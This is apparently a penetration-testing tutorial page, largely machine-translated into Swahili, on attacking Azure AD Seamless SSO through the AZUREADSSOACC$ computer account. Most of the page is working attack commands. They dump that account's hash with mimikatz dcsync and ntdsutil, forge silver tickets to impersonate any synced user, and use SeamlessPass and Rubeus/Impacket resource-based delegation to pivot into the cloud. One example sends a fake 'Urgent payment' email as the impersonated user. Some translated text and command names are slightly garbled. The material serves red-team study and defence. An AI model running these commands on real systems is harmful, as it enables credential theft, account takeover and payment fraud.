Az - Seamless SSO

Reading time: 10 minutes

Basic Information

From the docs: Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) kiotomatiki inasaini watumiaji wanapokuwa kwenye vifaa vyao vya kampuni vilivyounganishwa na mtandao wa kampuni yako. Wakati imewezeshwa, watumiaji hawahitaji kuandika nywila zao ili kuingia kwenye Azure AD, na kwa kawaida, hata kuandika majina yao ya mtumiaji. Kipengele hiki kinawapa watumiaji wako ufikiaji rahisi wa programu zako za msingi wa wingu bila kuhitaji vipengele vyovyote vya ziada vya ndani.

Kimsingi Azure AD Seamless SSO inasaini watumiaji wanapokuwa kwenye PC iliyounganishwa na kikoa cha ndani.

Inasaidiwa na PHS (Password Hash Sync) na PTA (Pass-through Authentication).

Desktop SSO inatumia Kerberos kwa ajili ya uthibitishaji. Wakati imewekwa, Azure AD Connect inaunda akaunti ya kompyuta inayoitwa AZUREADSSOACC$ katika AD ya ndani. Nywila ya akaunti ya AZUREADSSOACC$ inatumwa kama maandiko wazi kwa Entra ID wakati wa usanidi.

Tiketi za Kerberos zimefungwa kwa kutumia NTHash (MD4) ya nywila na Entra ID inatumia nywila iliyotumwa kufungua tiketi hizo.

Entra ID inatoa kiungo (https://autologon.microsoftazuread-sso.com) ambacho kinakubali tiketi za Kerberos. Kivinjari cha mashine iliyounganishwa na kikoa kinapeleka tiketi hizi kwa kiungo hiki kwa ajili ya SSO.

Enumeration

# Check if the SSO is enabled in the tenant
Import-Module AADInternals
Invoke-AADIntReconAsOutsider -Domain <domain name> | Format-Table

# Check if the AZUREADSSOACC$ account exists in the domain
Install-WindowsFeature RSAT-AD-PowerShell
Import-Module ActiveDirectory
Get-ADComputer -Filter "SamAccountName -like 'AZUREADSSOACC$'"

# Check it using raw LDAP queries without needing an external module
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.Filter = "(samAccountName=AZUREADSSOACC`$)"
$searcher.FindOne()

Pivoting: On-prem -> cloud

Ili kupata tiketi hiyo ya TGS, mshambuliaji anahitaji kuwa na moja ya yafuatayo:

• TGS ya mtumiaji aliyeathiriwa: Ikiwa unaharibu kikao cha mtumiaji na tiketi ya HTTP/autologon.microsoftazuread-sso.com kwenye kumbukumbu, unaweza kuitumia kufikia rasilimali za wingu.
• TGT ya mtumiaji aliyeathiriwa: Hata kama huna moja lakini mtumiaji ameathiriwa, unaweza kupata moja kwa kutumia hila ya uwakilishi wa TGT bandia iliyotekelezwa katika zana nyingi kama Kekeo na Rubeus.
• Hash au nywila ya mtumiaji aliyeathiriwa: SeamlessPass itawasiliana na kidhibiti cha eneo na habari hii ili kuunda TGT na kisha TGS.
• Tiketi ya dhahabu: Ikiwa una ufunguo wa KRBTGT, unaweza kuunda TGT unayohitaji kwa mtumiaji aliyeathiriwa.
• Hash au nywila ya akaunti ya AZUREADSSOACC$: Kwa habari hii na Kitambulisho cha Usalama (SID) cha mtumiaji, ni rahisi kuunda tiketi ya huduma na kuthibitisha na wingu (kama ilivyofanywa katika njia ya awali).

SeamlessPass

Kama ilivyoelezwa katika chapisho hili la blog, kuwa na mojawapo ya mahitaji ya awali ni rahisi sana kutumia zana SeamlessPass kufikia rasilimali za wingu kama mtumiaji aliyeathiriwa, au kama mtumiaji yeyote ikiwa una AZUREADSSOACC$ hash au nywila ya akaunti.

Hatimaye, kwa TGT inawezekana kutumia zana SeamlessPass na:

# Using the TGT to access the cloud
seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt <base64_encoded_TGT>
# Using the TGS to access the cloud
seamlesspass -tenant corp.com -tgs user_tgs.ccache
# Using the victims account hash or password to access the cloud
seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -username user -ntlm DEADBEEFDEADBEEFDEADBEEFDEADBEEF
seamlesspass -tenant corp.com -domain corp.local -dc 10.0.1.2 -username user -password password
# Using the AZUREADSSOACC$ account hash (ntlm or aes) to access the cloud with a specific user SID and domain SID
seamlesspass -tenant corp.com -adssoacc-ntlm DEADBEEFDEADBEEFDEADBEEFDEADBEEF -user-sid S-1-5-21-1234567890-1234567890-1234567890-1234
seamlesspass -tenant corp.com -adssoacc-aes DEADBEEFDEADBEEFDEADBEEFDEADBEEF -domain-sid S-1-5-21-1234567890-1234567890-1234567890 -user-rid 1234
wmic useraccount get name,sid # Get the user SIDs

Zaidi ya taarifa za kuweka Firefox kufanya kazi na seamless SSO zinaweza kupatikana katika chapisho hili la blog.

Kupata hash za akaunti ya AZUREADSSOACC$

Nenosiri la mtumiaji AZUREADSSOACC$ halibadiliki kamwe. Hivyo, msimamizi wa eneo anaweza kuathiri hash ya akaunti hii, na kisha kuitumia kuunda tiketi za fedha kuungana na Azure na mtumiaji yeyote wa on-prem aliyeunganishwa:

# Dump hash using mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"'
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit

# Dump hash using https://github.com/MichaelGrafnetter/DSInternals
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local

# Dump using ntdsutil and DSInternals
## Dump NTDS.dit
ntdsutil "ac i ntds" "ifm” "create full C:\temp" q q
## Extract password
Install-Module DSInternals
Import-Module DSInternals
$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'
(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos

Kuunda Tiketi za Fedha

Kwa hash unaweza sasa kuunda tiketi za fedha:

# Get users and SIDs
Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier

# Create a silver ticket to connect to Azure with mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4:<azureadssoacc hash> /target:autologon.microsoftazuread-sso.com /service:HTTP /ptt"'
mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:autologon.microsoftazuread-sso.com /service:HTTP /ptt" exit

# Create silver ticket with AADInternal to access Exchange Online
$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4"
$at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
## Send email
Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Subject "Urgent payment" -Message "<h1>Urgent!</h1><br>The following bill should be paid asap."

Kutumia Tiketi za Silver na Firefox

Ili kutumia tiketi ya fedha, hatua zifuatazo zinapaswa kufanywa:

1. Anzisha Kivinjari: Mozilla Firefox inapaswa kuzinduliwa.
2. Sanidi Kivinjari:

• Tembelea about:config.
• Weka upendeleo wa network.negotiate-auth.trusted-uris kwa thamani iliyoainishwa:
• https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com
• Tembelea Settings za Firefox > Tafuta Allow Windows single sign-on for Microsoft, work and school accounts na uweke kwenye hali ya kazi.

3. Fikia Programu ya Mtandao:

• Tembelea programu ya mtandao ambayo imeunganishwa na kikoa cha AAD cha shirika. Mfano wa kawaida ni login.microsoftonline.com.

4. Mchakato wa Uthibitishaji:

• Katika skrini ya kuingia, jina la mtumiaji linapaswa kuingizwa, huku uwanja wa nywila ukiwa tupu.
• Ili kuendelea, bonyeza TAB au ENTER.

On-prem -> Cloud kupitia Uwakilishi wa Rasilimali ulio na Mipaka

Ili kufanya shambulio inahitajika:

• WriteDACL / GenericWrite juu ya AZUREADSSOACC$
• Akaunti ya kompyuta unayodhibiti (hash & nywila) - Unaweza kuunda moja

1. Hatua 1 – Ongeza akaunti yako ya kompyuta

• Inaunda ATTACKBOX$ na kuchapisha SID/NTLM hash yake. Mtumiaji yeyote wa kikoa anaweza kufanya hivi wakati MachineAccountQuota > 0

# Impacket
python3 addcomputer.py CONTOSO/bob:'P@ssw0rd!' -dc-ip 10.0.0.10 \
-computer ATTACKBOX$ -password S3cureP@ss

2. Hatua 2 – Patia RBCD kwenye AZUREADSSOACC$ - Andika SID ya mashine yako kwenye msDS-AllowedToActOnBehalfOfOtherIdentity.

python3 rbcd.py CONTOSO/bob:'P@ssw0rd!'@10.0.0.10 \
ATTACKBOX$ AZUREADSSOACC$

# Or, from Windows:
$SID = (Get-ADComputer ATTACKBOX$).SID
Set-ADComputer AZUREADSSOACC$ `
-PrincipalsAllowedToDelegateToAccount $SID

3. Hatua 3 – Fanya TGS kwa mtumiaji yeyote (mfano: alice)

# Using your machine's password or NTLM hash
python3 getST.py -dc-ip 192.168.1.10 \
-spn HTTP/autologon.microsoftazuread-sso.com \
-impersonate alice \
DOMAIN/ATTACKBOX$ -hashes :9b3c0d06d0b9a6ef9ed0e72fb2b64821

# Produces alice.autologon.ccache

#Or, from Windows:
Rubeus s4u /user:ATTACKBOX$ /rc4:9b3c0d06d0b9a6ef9ed0e72fb2b64821 `
/impersonateuser:alice `
/msdsspn:"HTTP/autologon.microsoftazuread-sso.com" /dc:192.168.1.10 /ptt

You can now use the TGS to access Azure resources as the impersonated user.

Kuunda tiketi za Kerberos kwa watumiaji wa wingu pekee

Ikiwa wasimamizi wa Active Directory wana uf access kwa Azure AD Connect, wanaweza kweka SID kwa mtumiaji yeyote wa wingu. Kwa njia hii tiketi za Kerberos zinaweza kuundwa pia kwa watumiaji wa wingu pekee. Sharti pekee ni kwamba SID iwe SID sahihi.

References

• https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso
• https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/
• https://aadinternals.com/post/on-prem_admin/
• TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory